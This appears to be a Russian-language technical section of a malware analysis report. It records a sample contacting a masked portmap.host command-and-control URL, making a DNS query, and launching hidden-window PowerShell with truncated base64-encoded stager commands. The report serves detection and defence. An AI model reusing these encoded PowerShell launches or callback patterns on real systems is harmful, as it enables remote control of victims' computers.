Техническая информация
- http://an#######9.portmap.host:8080/admin/get.php via an#####609.portmap.host
- DNS ASK an#####609.portmap.host
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAcwBJAG8AbgBUAGEAQgBMAEUALgBQAFMAVgBFAFIAUwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0ARwBlACAAMwApAHsAJAA2ADgANgA2AD0AWwBSAGUARgBdAC4AQQBzAHMAZQBtAGIATAB5AC4ARwBl...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAcwBJAG8AbgBUAGEAQgBMAEUALgBQAFMAVgBFAFIAUwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0ARwBlACAAMwApAHsAJAA2ADgANgA2AD0AWwBSAGUARgBdAC4AQQBzAHMAZQBtAGIATAB5AC4ARwBl...